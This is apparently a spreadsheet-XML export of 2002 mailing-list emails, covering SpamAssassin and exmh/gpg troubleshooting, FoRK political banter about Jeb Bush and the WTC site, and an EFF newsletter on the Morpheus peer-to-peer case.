    <t>Wed, 11 Sep 2002 21:39:08 -0400</t>
  </si>
  <si>
    <t>"Geege Schuman" &lt;geege@barrera.org&gt;</t>
  </si>
  <si>
    <t>FW: Bush blew take two</t>
  </si>
  <si>
    <t>meant "gubernatorial PRIMARY."\n\n-----Original Message-----\nFrom: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Geege\nSchuman\nSent: Wednesday, September 11, 2002 9:32 PM\nTo: Tom; fork@spamassassin.taint.org\nSubject: RE: Bush blew take two\n\n\nyeshterday we f*cked up our gubernatorial election, too.  results to be\ncontested by reno.  same six districts that were sued in 2000 still came up\ngimpy.\n\ni suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a\npapier mache donkey and a papier mache elephant.  first one to batted open\nwins.\n\n-----Original Message-----\nFrom: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom\nSent: Wednesday, September 11, 2002 9:16 PM\nTo: fork@spamassassin.taint.org\nSubject: Bush blew take two\n\n\n[URL]http://www.washingtonpost.com[/URL]\n\n"MIAMI, Sept. 10 -- A two-gram rock of crack\ncocaine was found inside the shoe of Florida\nGov. Jeb Bush's 25-year-old daughter by workers\nat the central Florida rehabilitation center\nwhere she is undergoing court-ordered drug\ntreatment, Orlando police said today.\n\nNoelle Bush was not arrested because witnesses\nwould not give sworn statements, but the\nincident is under investigation, according to\nOrlando police spokesman Orlando Rolon."\n\nWow, the witnesses would not nark of a Bush girl in an era where there are\nno mare restrictions on being held without a cause?\n\nImagine that...\n\n-tom</t>
  </si>
  <si>
    <t>http://www.washingtonpost.com</t>
  </si>
  <si>
    <t>To: Robert Strickler &lt;Robert.Strickler@us.net56.net&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 11 Sep 2002 21:38:40 +0100</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 21:38:40 +0100</t>
  </si>
  <si>
    <t>Robert Strickler &lt;Robert.Strickler@us.net56.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Yeah right... If spamassassin was looking through th</t>
  </si>
  <si>
    <t>Robert Strickler said:\n\n&gt; Looks like we need an identity stamp in the X-Spam headers so that SA only\n&gt; accepts headers from authorized sources.\n\nWell, SpamAssassin will just ignore any old X-Spam-whatever headers\nit finds, so that cannot be used to get around the filter.\n\n--j.\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Tom" &lt;tomwhore@slack.net&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Wed, 11 Sep 2002 21:32:23 -0400</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 21:32:23 -0400</t>
  </si>
  <si>
    <t>"Tom" &lt;tomwhore@slack.net&gt;, &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: Bush blew take two</t>
  </si>
  <si>
    <t>yeshterday we f*cked up our gubernatorial election, too.  results to be\ncontested by reno.  same six districts that were sued in 2000 still came up\ngimpy.\n\ni suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a\npapier mache donkey and a papier mache elephant.  first one to batted open\nwins.\n\n-----Original Message-----\nFrom: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom\nSent: Wednesday, September 11, 2002 9:16 PM\nTo: fork@spamassassin.taint.org\nSubject: Bush blew take two\n\n\n[URL]http://www.washingtonpost.com[/URL]\n\n"MIAMI, Sept. 10 -- A two-gram rock of crack\ncocaine was found inside the shoe of Florida\nGov. Jeb Bush's 25-year-old daughter by workers\nat the central Florida rehabilitation center\nwhere she is undergoing court-ordered drug\ntreatment, Orlando police said today.\n\nNoelle Bush was not arrested because witnesses\nwould not give sworn statements, but the\nincident is under investigation, according to\nOrlando police spokesman Orlando Rolon."\n\nWow, the witnesses would not nark of a Bush girl in an era where there are\nno mare restrictions on being held without a cause?\n\nImagine that...\n\n-tom</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 11 Sep 2002 21:15:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 21:15:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>Bush blew take two</t>
  </si>
  <si>
    <t>[URL]http://www.washingtonpost.com[/URL]\n\n"MIAMI, Sept. 10 -- A two-gram rock of crack\ncocaine was found inside the shoe of Florida\nGov. Jeb Bush's 25-year-old daughter by workers\nat the central Florida rehabilitation center\nwhere she is undergoing court-ordered drug\ntreatment, Orlando police said today.\n\nNoelle Bush was not arrested because witnesses\nwould not give sworn statements, but the\nincident is under investigation, according to\nOrlando police spokesman Orlando Rolon."\n\nWow, the witnesses would not nark of a Bush girl in an era where there are\nno mare restrictions on being held without a cause?\n\nImagine that...\n\n-tom</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Wed, 11 Sep 2002 20:15:00 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 20:15:00 -0700</t>
  </si>
  <si>
    <t>Re: bad focus/click behaviours</t>
  </si>
  <si>
    <t>exmh has a funky cut/paste model that is essentially all my fault. The middle click sets the insert point.  If you hate that, go to the Bindings... Simple Edit preferences window and de-select "Paste Sets Insert".   &gt;&gt;&gt;George Michaelson said:  &gt;   &gt; I am a (tv)twm user. when I snarf text into my mouse cut buffer, and then  &gt; attempt to inject it into the exmh input windows for comp/repl, the  'point'  &gt; is often an apparently random place in the text pane, not where I think I  &gt; have current flashing cursor.   &gt;   &gt; I usually wipe out any of To:/Subject:/ with the text. Its  &gt; often not even beginning of line denoted, ie its an unexplicable number  &gt; of char spaces in to the text where it inserts,   &gt;   &gt; What am I doing wrong in either X, WM, shell, EXMH which is causing this? -- Brent Welch Software Architect, Panasas Inc Pioneering the World's Most Scalable and Agile Storage Network [URL]www.panasas.com[/URL] welch@panasas.com _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 11 Sep 2002 19:37:59 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 19:37:59 -0400 (EDT)</t>
  </si>
  <si>
    <t>TheThresher</t>
  </si>
  <si>
    <t>Is this old bits? It should be.\n\nI was browsing the local zine store here in Portland OR and found the\nsecond issue of The Thresher...very very sweet. Poltical socio articles on\nall manner of things from names you have come to love/despise over the\nyears. If you have not already, tombobjoewhore says check it out.\n\n[URL]www.thethresher.com[/URL]</t>
  </si>
  <si>
    <t>www.thethresher.com</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Joseph Burke" &lt;jburke@infinisource.com&gt;\nDate: Wed, 11 Sep 2002 18:42:49 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 18:42:49 -0700</t>
  </si>
  <si>
    <t>"Joseph Burke" &lt;jburke@infinisource.com&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Re: Spamassassin-talk digest, Vol 1 #659 - 41 msgs</t>
  </si>
  <si>
    <t>On 9/11/2002 at 10:01 AM  spamassassin-talk-request@lists.sourceforge.net spamassassin-talk@lists.sourceforge.net wrote: &gt;Message: 15 &gt;From: Vivek Khera  &gt;Date: Wed, 11 Sep 2002 10:06:55 -0400 &gt;To: spamassassin-talk@example.sourceforge.net &gt;Subject: Re: [SAtalk] Calypso email = ratware?  &gt; &gt;&gt;&gt;&gt;&gt;&gt; "JM" == Justin Mason  writes: &gt; &gt;JM&gt; Now all we need to do is get all the SpamAssassin users out there to &gt;JM&gt; upgrade... &gt; &gt;Considering that the rules need to adapt to the changing look and feel &gt;of spam vs. non-spam, does it make sense to have SA automatically &gt;issue a notice when it is, say 9 months old, recommending that the &gt;user/operator check for updated rules? &gt; &gt;Sort of like a nag-ware feature, but in self-defense for the user, not &gt;the vendor ;-) &gt; &gt;--  &gt;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= &gt;Vivek Khera, Ph.D.                Khera Communications, Inc. &gt;Internet: khera@kciLink.com       Rockville, MD       +1-240-453-8497 &gt;AIM: vivekkhera Y!: vivek_khera   [URL]http://www.khera.org[/URL] better yet would be a built-in server check on a periodic basis, even daily, looking for the existence of an update, and if found prompt the system admin to upgrade the server.  With the ever changing face of spam, this would probably be a big benefit to SA users and help keep everyone up to date.  We have not done this with too many of the apps we sell on [URL]www.RoseCitySoftware.com[/URL] strictly because of joe-average-user concerns about spyware and "phoning home", but in cases where the app needs to access the internet anyhow, we have done it with great success and minimal concern by our users. ---- Joseph Burke President/CEO InfiniSource, Inc.   ------------------------------------------------------- In remembrance [URL]www.osdn.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.khera.org www.RoseCitySoftware.com www.osdn.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;simonian@library.ucr.edu&gt;\nFrom: "Quentin Krengel" &lt;quentin@krengeltech.com&gt;\nDate: Wed, 11 Sep 2002 16:50:07 -0500</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 16:50:07 -0500</t>
  </si>
  <si>
    <t>"Quentin Krengel" &lt;quentin@krengeltech.com&gt;</t>
  </si>
  <si>
    <t>&lt;simonian@library.ucr.edu&gt;</t>
  </si>
  <si>
    <t>RE: [SAtalk] Debianized Packages for SA 2.3+</t>
  </si>
  <si>
    <t>I successfully installed spamassassin &amp; razor to run system wide on my\nDebian Woody server.  \n \nBriefly I \napt-get installed spamassassin razor and libmilter-dev,\n \ndownloaded spamass-milter-0.1.2.tar.gz from [URL]http://www.milter.org[/URL],\nungzipped and untarred the file into /etc/mail, \n \nfollowed the directions in /etc/mail/spamass-milter-0.1.2/README to\ncompile the milter, install the rc scripts, and edit and update\nsendmail.mc\n \nchanged /etc/default/spamassassin to set spamassassin to daemon mode.\n \nverified that spamassassin was running by tailing /var/log/mail.log\n \n \nWoody/stable has SA 2.20\nWoody/unstable has SA 2.41\n\nI'm running the stable source live right now and it is working very\nwell.\n\nIf you want unstable change /etc/apt/sources.list, substituting\n"unstable" for "stable",\nRun apt-get update\nInstall the unstable versions\nChange /etc/apt/sources.list\nRun apt-get update\n\n\nQuentin Krengel\nKrengel Technology Inc\n\n\n\n-----Original Message-----\nFrom: spamassassin-talk-admin@example.sourceforge.net\n[mailto:spamassassin-talk-admin@lists.sourceforge.net] On Behalf Of\nTanniel Simonian\nSent: Wednesday, September 11, 2002 4:15 PM\nTo: spamassassin-talk@example.sourceforge.net\nSubject: [SAtalk] Debianized Packages for SA 2.3+\n\n\nIm currently using woody.\n\nIs there a debianized package for SA on Woody, or at least somewhere I\ncan download from? Its been soo long that I haven't compiled stuff, that\nIm sort of shy to try again. =)\n\n\n\n-- \nTanniel Simonian\nProgrammer / Analyst III\nUCR Libraries\n[URL]http://libsys.ucr.edu[/URL]\n909 787 2832\n\n\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL] _______________________________________________\nSpamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.milter.org http://libsys.ucr.edu www.osdn.com https://lists.sourceforge.net www.osdn.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: Valdis.Kletnieks@vt.edu\nDate: Wed, 11 Sep 2002 15:52:25 -0400</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 15:52:25 -0400</t>
  </si>
  <si>
    <t>Re: exmh bug?</t>
  </si>
  <si>
    <t>--==_Exmh_9304186P\nContent-Type: text/plain; charset=us-ascii\n\nOn Wed, 11 Sep 2002 12:17:33 PDT, Brent Welch said:\n\n&gt; &gt;&gt;&gt;Hacksaw said:\n\n&gt;  &gt; When I receive a gpg encrypted message, and it asks me for a passphrase, \n&gt; it\n&gt;  &gt; first tries to ask me via the tty under which exmh is running. It tells \n&gt;\nHmm.. I've seen the *opposite* issue - if I go to *SEND* a signed message,\nsometimes Exmh will put up the dialog box, but fail to set keyboard focus\nthere, so no passphrase can be entered.  Of course, hitting 'return' doesnt\nwork so you need to click the 'OK' box, at which point it finds that the\npassphrase that wasn't entered doesn't work, and asks again, this time with\nproper focus set.\n\nI suspect some variable/codepath is getting hosed for the focus, or possibly\nsome borkedness with --no-tty and/or --status-fd flags to gnupg.\n\n/Valdis\n\n--==_Exmh_9304186P\nContent-Type: application/pgp-signature\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\nComment: Exmh version 2.5 07/13/2001\n\niD8DBQE9f575cC3lWbTT17ARApK5AKD+PToDpgdcd0Ore2BwJ1qVakfMDgCcDRsa\nHqcPiRZRSxFvAQBe+Ma1qmY=\n=lXe4\n-----END PGP SIGNATURE-----\n\n--==_Exmh_9304186P--\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Vince Puzzella &lt;vpuzzella@bluecatnetworks.com&gt;\nFrom: Ian White &lt;iwhite@victoria.tc.ca&gt;\nDate: Wed, 11 Sep 2002 15:26:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 15:26:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ian White &lt;iwhite@victoria.tc.ca&gt;</t>
  </si>
  <si>
    <t>Vince Puzzella &lt;vpuzzella@bluecatnetworks.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Badly Formatted Spam Report in HTML spam</t>
  </si>
  <si>
    <t>On Wed, 11 Sep 2002, Vince Puzzella wrote: &gt; Ever since I set defang_mime 0 all spam that contains HTML has a badly &gt; formatted report.  I think/realize it's because the report should be in &gt; HTML.  Is there anyway to get Spamassassin to add an HTML report in &gt; cases where it is required (defang_mime 0)? Funny, I was in the middle of composing the same message when I saw yours. It would be nice if it sees a header like: Content-type: text/html; charset=iso-8859-1 and defang_mime is 0, it could wrap the report with  for ease of reading? And the same sort of problem seems to occur with base64 encoded messages. The report is placed inside of the mime boundary: ------=_NextPart_000_00B7_31E64A2B.B8441E37 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: base64 Should this not go above (probably in it's own mime section,) to make sure that the attachments don't get destroyed? Ian ------------------------------------------- Ian White email: iwhite@victoria.tc.ca ------------------------------------------------------- In remembrance [URL]www.osdn.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;\nDate: Wed, 11 Sep 2002 15:23:54 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 15:23:54 -0700</t>
  </si>
  <si>
    <t>[SAtalk] Is DCC for real?</t>
  </si>
  <si>
    <t>So far today, I've found eff.org and mandrakesoft.com in DCC.  My confidence \nin DCC is beginning to drop.\n-- \nRobin Lynn Frank\nParadigm-Omega, LLC\n==================================\nNo electrons were harmed in the sending\nof this message.  However, two neutrons and \na proton complained about the noise.\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Chris Haun &lt;chris@noskillz.com&gt;\nDate: Wed, 11 Sep 2002 15:08:10 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 15:08:10 -0400 (EDT)</t>
  </si>
  <si>
    <t>From salon.com - Forbidden thoughts about 9/11</t>
  </si>
  <si>
    <t>i though this was all rather interesting, first bit of 9/11 coverage that \ni've liked.\n\n[URL]http://www.salon.com[/URL]\n\nChris</t>
  </si>
  <si>
    <t>http://www.salon.com</t>
  </si>
  <si>
    <t>To: Hacksaw &lt;hacksaw@hacksaw.org&gt;\nFrom: kchrist@lsil.com\nDate: Wed, 11 Sep 2002 13:48:40 -0600</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 13:48:40 -0600</t>
  </si>
  <si>
    <t>Hacksaw &lt;hacksaw@hacksaw.org&gt;</t>
  </si>
  <si>
    <t>The way to debug something like this is to turn on the log (Preferences  -&gt; Hacking Support -&gt; Debug log enabled) and track the gpg commands  being issued and the responses. FWIW, using exmh 2.5 and gpg 1.0.7 I do not have problems sending  encrypted messages to myself. When I select the message, an xterm  window pops up asking for the passphrase. I don't recall exmh ever  asking me for the passphrase from the tty that started exmh nor from a  dialog box. (But then again, I'm not a heavy gpg user). Kevin In message &lt;200209111917.PAA02912@blackcomb.panasas.com&gt;, Brent Welch writes: &gt; Hmm - I'm cc'ing the exmh-workers list, because I really don't know &gt; much about the various PGP interfaces.  I think there has been some &gt; talk about "issues" with the latest version of gpg. &gt;  &gt; &gt;&gt;&gt;Hacksaw said: &gt;  &gt; version 2.5 08/15/2002 &gt;  &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 &gt;  &gt; EDT 2001 i686 unknown &gt;  &gt; Tk 8.3 Tcl 8.3 &gt;  &gt;  &gt;  &gt; It's not clear to me this is a bug with exmh per se, but it's something  &gt;  &gt; that manifests through exmh, so I figured asking you might help me track &gt;  &gt; it down. &gt;  &gt;  &gt;  &gt; When I receive a gpg encrypted message, and it asks me for a passphrase,  &gt;  &gt; it first tries to ask me via the tty under which exmh is running. It  &gt;  &gt; tells me my passphrase is incorrect every time, at which point exmh  &gt;  &gt; offers me the line in the message about decrypting. I click the line  &gt;  &gt; and it offers me the dialog box, and tells me the passphrase is correct, &gt;  &gt; and shows me the decrypted message. &gt;  &gt;  &gt;  &gt; Any ideas on that? _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Stephane Lentz &lt;Stephane.Lentz@ansf.alcatel.fr&gt;\nFrom: David Raistrick &lt;drais@wow.atlasta.net&gt;\nDate: Wed, 11 Sep 2002 13:46:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 13:46:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Wed, 11 Sep 2002, Stephane Lentz wrote:\n\n&gt; =&gt; I faced a similar problem with the FreeBSD when trying to \n&gt; install SpamAssassin through the ports on my fresh FreeBSD 4.6.2. \n&gt; I had to define PERL5LIB with some given order of directories\n&gt; so that the latest File::Spec module get used. \n\nGood to hear it's not just me.  Mind telling me how you set PERL5LIB\nspecificly? I've tried a few things (setenv in the shell, as well as\n$PERL5LIB == ...inside the Makefile.PL, even on the perl command\nline..) with no success.\n\nthanks.\n\n..david\n\n\n---\ndavid raistrick\ndrais@atlasta.net		[URL]http://www.expita.com[/URL]\n\n\n\n\n-------------------------------------------------------\nIn remembrance\n[URL]www.osdn.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.expita.com www.osdn.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 11 Sep 2002 13:44:46 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 13:44:46 -0400 (EDT)</t>
  </si>
  <si>
    <t>Keillor voices up on what to do with the WTC site</t>
  </si>
  <si>
    <t>[URL]http://www.phc.mpr.org[/URL]\n\nDear Garrison,\n\nThere are at least six plans about what to do with\n"Ground Zero" in New York. I believe a suitable memorial\nsurrounded by a lovely park with benches, walkways,\nchildren's playgrounds, possibly some concessions such\nas a restaurant, small theater and a place for art works\nwould be the best tribute to those who lost their lives.\nWhat do you think should done with the space?\n\nJoe Adams\nHillsdale, New Jersey\n\nI dread the thought of a big memorial in Manhattan\nthat's designed by committee and that's gone through\npublic hearings and so forth ----- it's going to be cold\nand ugly and pretentious and the upshot will be one more\npublic space that the public hates, of which there are\nplenty already. New York is a bustling commercial city\nand that's the beauty of it, it's a city of young\nambitious dreamy people, like the folks who died in the\ntowers, and it's not a memorializing city. Historic\nevents occurred in New York that in any other city would\nbe commemorated with interpretive centers and guides and\nhistorical museums and in New York there's barely a\nlittle plaque. That's a great thing, in my estimation.\nIt's a hustling city, full of immigrants looking for\ntheir big chance, and compared to that spirit of\nentrepreneurship, a memorial plaza with a fountain and a\nstatue of something seems dead to me. Look at Grant's\nTomb. Who walks past it and thinks about President\nGrant? Nobody. People sit in the plaza by Grant's Tomb\nand think about lunch, about sex, about money, about all\nthe things that New York is about. If you want to find\nGrant, read his memoirs. His monument seems odd in New\nYork: it belongs in Washington, which is our memorial\ncity. New York is for the young and lively.</t>
  </si>
  <si>
    <t>http://www.phc.mpr.org</t>
  </si>
  <si>
    <t>To: Hacksaw &lt;hacksaw@hacksaw.org&gt;\nFrom: Kevin Cosgrove &lt;kevinc@dOink.COM&gt;\nDate: Wed, 11 Sep 2002 13:26:27 -0700</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 13:26:27 -0700</t>
  </si>
  <si>
    <t>Kevin Cosgrove &lt;kevinc@dOink.COM&gt;</t>
  </si>
  <si>
    <t>Here's a message that works fine for me: X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: kevinc@doink.com Subject: gpg test Mime-Version: 1.0 Content-Type: text/x-pgp; format=mime; x-action=encrypt; 	x-recipients="D165C0CC, D165C0CC" Content-Transfer-Encoding: 7bit Date: Wed, 11 Sep 2002 13:18:58 -0700 From: Kevin Cosgrove  Message-Id: &lt;20020911201900.492892FEAB@joseph.doink.com&gt; -----BEGIN PGP MESSAGE----- Version: GnuPG v1.0.7 (GNU/Linux) Comment: Exmh version 2.5 10/15/1999 blah, blah, blah -----END PGP MESSAGE----- It could be that your content type of text/plain is messing you up. Your config stuff looks substantially the same as mine. Cheers.... On 11 September 2002 at 16:11, Hacksaw  wrote: You may assume the X's were originally a valid address. X-em-version: 5, 0, 0, 4 X-em-registration: #01E0520310450300B900 X-priority: 3 X-mailer: My Own Email v4.00 Mime-version: 1.0 Content-type: text/plain; charset=US-ASCII Subject: Discussion From: "XXXXXXX"  Date: Tue, 10 Sep 2002 05:47:46 -0500 (06:47 EDT) To: hacksaw@hacksaw.org *gpgRfc822:     0 *gpgChooseKey:  1 *gpgRunTwice:   1 *gpgCacheIds:   persistent *gpgMinMatch:   75 *gpgShowInline: none *gpgShortMessages:      1 *gpgAutoExtract:        1 *gpgKeyServer:  pgp-public-keys@keys.pgp.net *gpgKeyQueryMethod:     hkp *gpgHKPKeyServerUrl:    keys.pgp.com *gpgKeyServerURL:       [URL]http://www-swiss.ai.mit.edu[/URL] =get&amp;search=0x%s *gpgKeyOtherMethod:     exec echo "can't find $id" &gt; $tmp *gpgComment:    Exmh version 2.5 08/15/2002 *gpgModulePath: /usr/lib/gnupg *gpgCipherMods: skipjack idea *gpgDigestMods: tiger *gpgPubkeyMods: rsa *gpgPgp5Compatibility:  1 *gpgCipherAlgo: 3des *gpgDigestAlgo: sha1 *gpgCompressAlgo:       zip _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www-swiss.ai.mit.edu https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqqs-eff@example.com\nFrom: Effector List &lt;alerts@action.eff.org&gt;\nDate: Wed, 11 Sep 2002 13:11:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 11 Sep 2002 13:11:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>Effector List &lt;alerts@action.eff.org&gt;</t>
  </si>
  <si>
    <t>qqqqqqqqqqs-eff@example.com</t>
  </si>
  <si>
    <t>EFFector 15.28: Motions Filed in Morpheus Peer-to-Peer Case,</t>
  </si>
  <si>
    <t>EFFector Online Newsletter\n\nEFFector      Vol. 15, No. 28      September 11, 2002      ren@eff.org\n\nA Publication of the Electronic Frontier Foundation     ISSN 1062-9424\nIn the 227th Issue of EFFector:\n\n    * Motions Filed in Morpheus Peer-to-Peer Case\n    * EFF's Second Annual Share-In This Weekend!\n    * Help With Our Internet Blocking in Schools Project\n    * Deep Links\n    * Administrivia\n\nFor more information on EFF activities &amp; alerts: [URL]http://www.eff.org[/URL]\n\nTo join EFF or make an additional donation:\n  [URL]http://www.eff.org[/URL]\nEFF is a member-supported nonprofit. Please sign up as a member today!\n\n\n*Motions Filed in Morpheus Peer-to-Peer Case\nJudge to Consider Legality of Gnutella Software\n\nLos Angeles - Attorneys for StreamCast Networks, developers of the\npopular Morpheus peer-to-peer (P2P) file sharing software, filed\nbriefs in federal court on Monday seeking a ruling that distribution\nof the software does not violate copyright law.\n\nMorpheus is a popular file-sharing application based on the\ndecentralized Gnutella P2P networking protocol.\n\nIn their briefs seeking summary judgment, attorneys from the\nElectronic Frontier Foundation (EFF) and the law firm of Brobeck,\nPhleger and Harrison argued that distribution of the software is legal\nbecause the product is capable of substantial noninfringing uses and\nbecause StreamCast cannot control the various uses of the software.\n\nSupporting StreamCast in the motion is nine time Grammy nominee Janis\nIan, who believes that peer-to-peer software represents important new\nopportunities for artists.\n\nOn October 2, 2001, 28 of the world's largest entertainment companies\nsued StreamCast for the allegedly infringing actions of users of its\nproduct (MGM et al v. Grokster et al, Case No. 01-CV-8541 SVW).\n\nAdditional briefs will be filed in the months to come, with oral\narguments set for December 2, 2002, before U.S. Federal District Court\nJudge Stephen Wilson in Los Angeles.\nLinks:\n\nFor this release:\n[URL]http://www.eff.org[/URL]\n\nDocuments related to Metro-Goldwyn Mayer v. Grokster case:\n[URL]http://www.eff.org[/URL]\n\nJanis Ian's "Internet Debacle" article:\n[URL]http://www.janisian.com[/URL]\n\n- end -\n\n\n*Electronic Frontier Foundation Holds Second Annual Share-In\nJohn Perry Barlow, Mountain Girl Garcia Host Free Music Fest\n\nSan Francisco - Join the Electronic Frontier Foundation and five Bay\nArea bands for an afternoon of live music and outdoor fun at EFF's\nsecond annual Share-In. The festival will be held in Golden Gate\nPark's Music Concourse Bandshell on Saturday, September 14th from noon\n- 5pm. The celebration of independent music will be hosted by Grateful\nDead lyricist and EFF co-founder John Perry Barlow and former wife of\nthe late great Jerry Garcia, Mountain Girl Garcia.\n\nArtists participating in this event will permit recording of their\nperformances by those in attendance in support of EFFs Open Audio\nLicense (OAL). Musicians performing at the event include: the Box Set\nDuo - clown princes of folk-rock, the classic funk band Funkmonsters,\nceltic world-fusion group Hy Brassyl, harmony based folk-pop band\nAtticus Scout, and Berkeley-based party band Shady Lady.\n\nIn addition to music, the Share-In will feature performers including\nAshley Foster the One Wheeled Wonder, the Existential Circus,\nFrantastic Hands, the Metronome Dancers, and Willy Bologna and his\nSideshow Circus. Bring your family and friends!\n\nBen and Jerry's will sell their famous ice cream, and Cartwheel\nCatering will be on site with hot dogs, pretzels, and churros.\n\nProceeds from the Share-In will go directly to EFF's Campaign for\nAudiovisual Free Expression (CAFE), which oversees projects such as\nthe Open Audio License. CAFE empowers the creative community in\ncyberspace by protecting the public's access to and use of audiovisual\ntechnologies.\n\nThe Open Audio License is a tool that EFF has developed in order to\nhelp artists share music more directly with their fans, without\nsacrificing recognition for their creativity. The OAL encourages\ncollaboration, providing artists with an alternative to a business\nmodel strictly driven by profit. Based on the open source and free\nsoftware initiatives for software development, the OAL encourages\nartists to share with one another and their fans\n\nAdoption of the OAL does not mean that artists go unrewarded for their\nwork. On the contrary, the OAL permits artists to share single tracks\nor performances and gain widespread recognition for their work without\nrelying on intermediaries. EFF encourages new models of music\ndistribution in the digital world that benefit the artists themselves.\nThe Internet makes it possible to drastically reduce the overhead for\npackaging and distributing music, which is where record companies\ncurrently spend most of the money that could be going to artists. EFF\nis committed to developing tools that empower artists to take control\nover their own art and to be compensated appropriately for their works.\n\nWhen: Saturday, September 14th, Noon-5pm\n\nWhere: Music Concourse Bandshell in Golden Gate Park, near the\nJapanese Tea Gardens between MLK Drive and JFK Drive\n\nMore Information and Travel Directions:\n[URL]http://www.eff.org[/URL]\nLinks:\n\nEFF's Cafe Project:\n[URL]http://www.eff.org[/URL]\n\nThe Open Audio License:\n[URL]http://www.eff.org[/URL]\n\n- end -\n\n\n*Help With Our Internet Blocking in Schools Study\n\nIf you know of any public school students, teachers, school\nadministrators, school board members, parents, or recent public school\nalumni in the United States who are willing to speak about the impact\nof Internet blocking on educational opportunities, the EFF would like\nto make contact with them. We are especially looking for people in or\nnear the following areas:\n\n    * Asheville, NC\n    * Boston, MA\n    * Nashville, TN\n    * New York City\n    * San Francisco, CA\n\nPlease have them contact:\nWill Doherty\nwild@eff.org\n\n- end -\n\n\n*Deep Links\nDeep Links features noteworthy news items, victories, and 